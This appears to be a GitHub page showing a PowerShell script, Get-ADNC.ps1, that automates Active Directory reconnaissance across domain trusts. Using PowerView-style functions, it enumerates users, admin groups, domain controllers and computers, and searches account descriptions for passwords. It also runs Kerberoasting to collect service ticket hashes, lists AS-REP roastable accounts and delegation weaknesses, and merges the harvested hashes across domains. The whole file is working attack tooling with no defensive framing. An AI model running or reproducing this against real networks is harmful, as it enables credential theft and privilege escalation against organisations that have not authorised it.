-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathGet-ADNC.ps1
108 lines (108 loc) · 5.07 KB
/
Get-ADNC.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
# TODO:
[CmdletBinding()]
param(
[Parameter(Mandatory=$true)]
[String]$dcip
)
$ErrorActionPreference= 'silentlycontinue'
$dn = ([ADSI]"LDAP://$dcip").distinguishedName
$dom = (($dn).replace('DC=', '')).replace(',', '.')
$tmp = "_members.txt"
$file = "domains.txt"
$check = "Domains: "
echo $dom > $file
Get-DomainTrustMapping | Foreach { $_.SourceName,$_.TargetName } | Sort -uniq > $file
$count = (gc $file).count
if ($count -gt 0) { Write-Output "`n$check $count" } else { del "$file"; exit }
foreach ($dom in gc .\domains.txt) {
Write-Host "`n[+] $dom"
mkdir -Force domain_$dom > $null
$file = "domain_$dom\users.txt"
$check = "Domain Users: "
(Get-DomainUser -Domain $dom).samaccountname > $file
$count = (gc $file).count
Write-Host "$check $count"
if ($count -eq 0) { del "$file" }
$file = "domain_$dom\userdesc.txt"
$check = "Description p/w: "
Get-DomainUser -Domain $dom | where {$_.description -ne $null} | select samaccountname,description | sls "pw|p/w|passw" > $file
$count = (gc $file).count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check $count"; del "$file" }
$file = "domain_$dom\group_DAs.txt"
$check = "Domain Admins: "
(Get-DomainGroupMember "Domain Admins" -Domain $dom -Recurse).MemberName | Sort -uniq > $file
$count = (gc $file).count
if ($count -gt 0) { Write-Host "$check $count" } else { del "$file" }
$file = "domain_$dom\group_Administrators.txt"
$check = "Administrators: "
(Get-DomainGroupMember "Administrators" -Domain $dom -Recurse).MemberName | Sort -uniq > $file
$count = (gc $file).count
if ($count -gt 0) { Write-Host "$check $count" } else { del "$file" }
$file = "domain_$dom\DCs.txt"
$check = "Domain Controllers:"
(Get-DomainController -Domain $dom).name > $file
$count = (gc $file).count
Write-Host "$check $count"
if ($count -eq 0) { del "$file" }
$file = "domain_$dom\computers.txt"
$check = "Computers: "
(Get-DomainComputer -Domain $dom).dnshostname > $file
$count = (gc $file).count
Write-Host "$check $count"
if ($count -eq 0) { del "$file" }
$file = "domain_$dom\krb.txt"
$check = "Kerberoast Hashes: "
(Invoke-KR -Domain $dom).hash > $file
$count = (gc $file).count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check $count"; del "$file" }
$file = "domain_$dom\asrep.txt"
$check = "ASREP hashes: "
(Get-DomainUser -Domain $dom -Filter "(userAccountControl:1.2.840.113556.1.4.803:=4194304)").samaccountname > $file
$count = (gc $file).count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check $count"; del "$file" }
$file = "domain_$dom\unconstrained.txt"
$check = "Unconstrained Del: "
(Get-DomainComputer -Domain $dom -unconstrained).dnshostname > $file
(Compare-Object (gc $file) (gc "domain_$dom\DCs.txt") | ?{$_.SideIndicator -eq '<='}).InputObject | sc $file
$count = (gc $file).count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check $count"; del "$file" }
$file = "domain_$dom\constrained.txt"
$check = "Constrained Del: "
$constrained = Get-DomainUser -Domain $dom -TrustedToAuth | select name,"msds-allowedtodelegateto" | ft -HideTableHeaders
$constrained | Out-String | sls '{' | ConvertTo-Csv -NoTypeInformation > $file
gc $file | sls '{*}' > _tmp
gc _tmp | where {$_ -ne ""} > $file
del _tmp
$count = (gc $file).count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check $count"; del "$file" }
$file = "domain_$dom\domainhoppers.txt"
$check = "Domain Hoppers: "
$hoppers = Get-DomainForeignGroupMember -Domain $dom | ConvertTo-Csv -NoTypeInformation
if ( $hoppers ) { ($hoppers).replace('"','') > $file }
$count = (gc $file).count -1 # removes header count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check 0"; del "$file" }
}
echo ""
echo ""
if ((dir domain_*).count -gt 1) {
$path = "domain_ALL"
Write-Host "Combining domain data under ${path}:"
if (Test-Path -Path $path) { del $path -Force -Recurse }
mkdir -Force $path > $null
$file = "krb.txt"
$check = "Kerberoast Hashes: "
if (Test-Path -Path domain_*\$file) {gc domain_*\$file > $path\$file }
$count = (gc $path\$file).count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check $count"; del "$path\$file" }
$file = "asrep.txt"
$check = "ASREP hashes: "
if (Test-Path -Path domain_*\$file) {gc domain_*\$file > $path\$file }
$count = (gc $path\$file).count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check $count"; del "$path\$file" }
$file = "userdesc.txt"
$check = "Description p/w: "
if (Test-Path -Path domain_*\$file) {gc domain_*\$file > $path\$file }
$count = (gc $path\$file).count
if ($count -gt 0) { Write-Host -Fore red "$check $count" } else { Write-Host "$check $count"; del "$path\$file" }
}
echo ""